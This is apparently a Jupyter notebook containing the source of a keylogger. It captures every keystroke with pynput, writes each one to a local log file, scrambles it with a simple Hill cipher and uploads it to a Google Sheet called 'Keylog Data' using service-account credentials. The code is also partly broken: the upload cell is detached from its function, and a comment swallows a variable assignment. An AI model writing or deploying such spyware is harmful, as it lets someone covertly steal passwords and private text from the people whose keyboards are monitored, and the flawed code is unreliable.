In [ ]:
!pip install pynput

In [ ]:
import os
import sys
import math
import numpy as np
from pynput.keyboard import Key, Listener

In [ ]:
import logging
from datetime import datetime
import gspread
from oauth2client.service_account import ServiceAccountCredentials

In [ ]:
!pip install gspread

In [ ]:
!pip install oauth2client

In [ ]:
# using credentials to create a client to interact with the Google Drive API
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']



In [ ]:
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secrets.json', scope)


In [ ]:
client = gspread.authorize(creds)
sheet = client.open("Keylog Data").sheet1

In [ ]:
def uploadToDatabase(key):
    print("Uploading to database: ", end=" ")

In [ ]:
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
row = [dt_string, key]
print(row)
index = 1
sheet.insert_row(row, index)

In [ ]:
log_dir = ""
print("Keylogger is Running")
logging.basicConfig(filename=(log_dir + "key_log.txt"),
level=logging.DEBUG, format='%(asctime)s: %(message)s')
hill_key='oplk'

In [ ]:
def encrypt(msg):
    # Replace spaces with nothing
    msg = msg.replace(" ", "")
    # Ask for keyword and get encryption matrix
    C = make_key()
    # Append zero if the messsage isn't divisble by 2 len_check =
    len(msg) % 2 == 0
    if not len_check:
        msg += "0"
    # Populate message matrix
    P = create_matrix_of_integers_from_string(msg) # Calculate length of the message
    msg_len = int(len(msg) / 2)
    # Calculate P * C
    encrypted_msg = ""
    for i in range(msg_len):
        # Dot product
        row_0 = P[0][i] * C[0][0] + P[1][i] * C[0][1]
        # Modulate and add 65 to get back to the A-Z range in ascii
        integer = int(row_0 % 26 + 65)
        # Change back to chr type and add to text
        encrypted_msg += chr(integer)
        # Repeat for the second column
        row_1 = P[0][i] * C[1][0] + P[1][i] * C[1][1]
        integer = int(row_1 % 26 + 65)
        encrypted_msg += chr(integer)
    return encrypted_msg

In [ ]:
def make_key():
    # Make sure cipher determinant is relatively prime to 26 and only a/A - z/Z are given
    determinant = 0
    C = None
    while True:
        cipher = hill_key
        C = create_matrix_of_integers_from_string(cipher)
        determinant = C[0][0] * C[1][1] - C[0][1] * C[1][0]
        determinant = determinant % 26
        inverse_element = find_multiplicative_inverse(determinant)
        if inverse_element == -1:
            print("Determinant is not relatively prime to 26, uninvertible key")
        elif np.amax(C) > 26 and np.amin(C) < 0:
            print("Only a-z characters are accepted")
            print(np.amax(C), np.amin(C))
        else:
            break
    return C

In [ ]:
def find_multiplicative_inverse(determinant):
    multiplicative_inverse = -1
    for i in range(26):
        inverse = determinant * i
        if inverse % 26 == 1:
            multiplicative_inverse = i
            break
    return multiplicative_inverse

In [ ]:
def create_matrix_of_integers_from_string(string):
    # Map string to a list of integers a/A <-> 0, b/B <-> 1 ... z/Z <-> 25
    integers = [chr_to_int(c) for c in string]
    length = len(integers)
    M = np.zeros((2, int(length / 2)), dtype=np.int32)
    iterator = 0
    for column in range(int(length / 2)):
        for row in range(2):
            M[row][column] = integers[iterator]
            iterator += 1
    return M

In [ ]:
def chr_to_int(char):
    char = char.upper()
    integer = ord(char) - 65
    return integer

In [ ]:
def on_press(key):
    s = str(key)[1] + 'x'
    print(s)
    encryptedKey = encrypt(s)
    uploadToDatabase(str(encryptedKey)) # uploading encrypted key pressed to cloud database
    logging.info(str(key)) # logging key pressed

In [ ]:
with Listener(on_press=on_press) as listener:
    listener.join()